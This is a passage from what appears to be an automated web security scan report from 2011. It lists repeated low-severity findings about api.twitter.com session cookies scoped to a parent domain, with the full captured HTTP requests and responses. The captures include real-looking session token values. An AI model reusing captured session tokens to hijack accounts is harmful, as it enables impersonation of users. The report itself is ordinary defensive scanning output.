Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/MSFTResearch.json?callback=twitterCallback1&count=20&include_rts=true&cb=0.9466070765629411 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/MicrosoftResearch/tabid/81/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.1.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:10:45 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055445-71261-45206
X-RateLimit-Limit: 150
ETag: "aca9628d4a3fc4347dcea521d1a5dc51"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:10:45 GMT
X-RateLimit-Remaining: 80
X-Runtime: 0.05589
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: c60411d9469e43c5b4c2ea13d48be94ea96dc19b
X-RateLimit-Reset: 1315058926
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 40168
Connection: close

twitterCallback1([{"id_str":"108992350654693376","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"e3e4e2","protected":false,"id_str":"21457289","default_profile":fa
...[SNIP]...

10.4. http://api.twitter.com/1/statuses/user_timeline/SharePoint.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline/SharePoint.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/SharePoint.json?callback=twitterCallback1&count=20&include_rts=true&cb=0.07148340088315308 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.1.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:10:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055423-24298-25111
X-RateLimit-Limit: 150
ETag: "ba793ac022c58267c2b011c5d69d6fa8"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:10:23 GMT
X-RateLimit-Remaining: 114
X-Runtime: 0.06922
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 94000fb7a11d6cd186ccd2044a4f0420af8e80b6
X-RateLimit-Reset: 1315058926
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 39431
Connection: close

twitterCallback1([{"id_str":"109738122539040768","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"8a8f88","protected":false,"id_str":"26541422","notifications":fals
...[SNIP]...

10.5. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline/msnewengland.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/msnewengland.json?callback=twitterCallback1&count=20&include_rts=true&cb=0.09756158874370158 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Working/Jobs/tabid/145/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.1.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCCzwYy8yAToOcmV0dXJuX3RvIiRodHRwOi8v%250AdHdpdHRlci5jb20vbXNmdHJlc2VhcmNoIgpmbGFzaElDOidBY3Rpb25Db250%250Acm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgdpZCIlYzBm%250ANzRjZjk3MDM4ODFjOTY0MDg0NGNiMmIxZDBmNzQ6DGNzcmZfaWQiJWI0ZDE4%250AYzBiMTIzNjFiMjllNjg3ODEwMzg0ZGM0Njdh--d45c6815ed8f43855aff674ef2335380c015147e

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:08:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055326-49454-28329
X-RateLimit-Limit: 150
ETag: "6e2a84db79cba3eb632f2bb0a5aa9bf0"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:08:46 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02787
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 89b406751d38c59e2b9f4ed8f6d34c2fe2eddb34
X-RateLimit-Reset: 1315058926
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 72091
Connection: close

twitterCallback1([{"retweeted_status":{"id_str":"109776676589801472","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"C0DFEC","protected":false,"id_str":"259784927"
...[SNIP]...

10.6. http://api.twitter.com/1/trends/1.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/trends/1.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/trends/1.json?pc=false&personalized=false HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-14511-3550
X-RateLimit-Limit: 1000
ETag: "4ae65bcc6c25f8e92921d564b5f52cc0"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 918
X-Runtime: 0.00951
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: max-age=300, must-revalidate
X-MID: a3b38fddc509eeacb27be351b79049caf50a7c6f
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwgs8GMvMgE6B2lk%250AIiVjMGY3NGNmOTcwMzg4MWM5NjQwODQ0Y2IyYjFkMGY3NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--3d57475cc03ae064aa02ac897973859ef1392693; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 1732
Connection: close

[{"as_of":"2011-09-03T13:11:07Z","locations":[{"woeid":1,"name":"Worldwide"}],"trends":[{"query":"%2310CancionesQueNoVoyOlvidar","name":"#10CancionesQueNoVoyOlvidar","url":"http:\/\/twitter.com\/searc
...[SNIP]...

10.7. http://api.twitter.com/1/trends/available.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/trends/available.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/trends/available.json?lang=en HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-11220-58142
X-RateLimit-Limit: 1000
ETag: "f827a919eae7f84ffa87a2017bfa70a7"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 924
X-Runtime: 0.09612
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: max-age=2592000, must-revalidate
X-MID: f35ebe7707e2a60c095bd4a08d8619b5927749e4
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 21317
Connection: close

[{"woeid":23424969,"name":"Turkey","parentid":1,"url":"http:\/\/where.yahooapis.com\/v1\/place\/23424969","placeType":{"name":"Country","code":12},"countryCode":"TR","country":"Turkey"},{"woeid":23645
...[SNIP]...

10.8. http://api.twitter.com/1/urls/resolve.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/urls/resolve.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/urls/resolve.json?urls%5B%5D=http%3A%2F%2Ft.co%2FDZbwq2r&urls%5B%5D=http%3A%2F%2Ft.co%2FBvjrJND&urls%5B%5D=http%3A%2F%2Ft.co%2FNXvo96p&urls%5B%5D=http%3A%2F%2Ft.co%2FJEK0Uwt&urls%5B%5D=http%3A%2F%2Ft.co%2Frmivlz6&urls%5B%5D=http%3A%2F%2Ft.co%2FLCS6x0L HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCCzwYy8yAToOcmV0dXJuX3RvIiRodHRwOi8v%250AdHdpdHRlci5jb20vbXNmdHJlc2VhcmNoOgdpZCIlYzBmNzRjZjk3MDM4ODFj%250AOTY0MDg0NGNiMmIxZDBmNzQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6DGNzcmZfaWQiJWI0ZDE4%250AYzBiMTIzNjFiMjllNjg3ODEwMzg0ZGM0Njdh--a4167d343994f3345ca9273ae21febed2a6a18bb

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055703-76483-6679
X-RateLimit-Limit: 1000
ETag: "1cd5ae66a39669107f466e34aeb2db0a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:03 GMT
X-RateLimit-Remaining: 838
X-Runtime: 0.00848
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 20bbd750b9efae64a1a49d6f2193f5447800ef9d
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 731
Connection: close

{"http:\/\/t.co\/BvjrJND":"http:\/\/frankgruber.me\/post\/9683723109\/were-underway-at-the-techcocktail-boston-summer\/","http:\/\/t.co\/NXvo96p":"https:\/\/foursquare.com\/alwillis\/checkin\/4e6010b8
...[SNIP]...

10.9. http://api.twitter.com/1/users/search.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/users/search.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/users/search.json?reputable=true&display_location=search-component&pc=true&q=%23TechCocktailBOS HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-45108-50610
X-RateLimit-Limit: 1000
ETag: "d751713988987e9331980363e24189ce"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 928
X-Runtime: 0.02260
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: f93599e88aea3aada9e6f45227542fc39a33d090
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 2
Connection: close

[]

10.10. http://api.twitter.com/i/search/image_facets.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /i/search/image_facets.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/search/image_facets.json?q=%23TechCocktailBOS&count=100&include_entities=true HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-44326-31901
X-RateLimit-Limit: 1000
ETag: "d751713988987e9331980363e24189ce"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 919
X-Runtime: 0.04123
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 5334a5d9d0766cf62564aec25fcc48f383905b2a
X-RateLimit-Reset: 1315058673
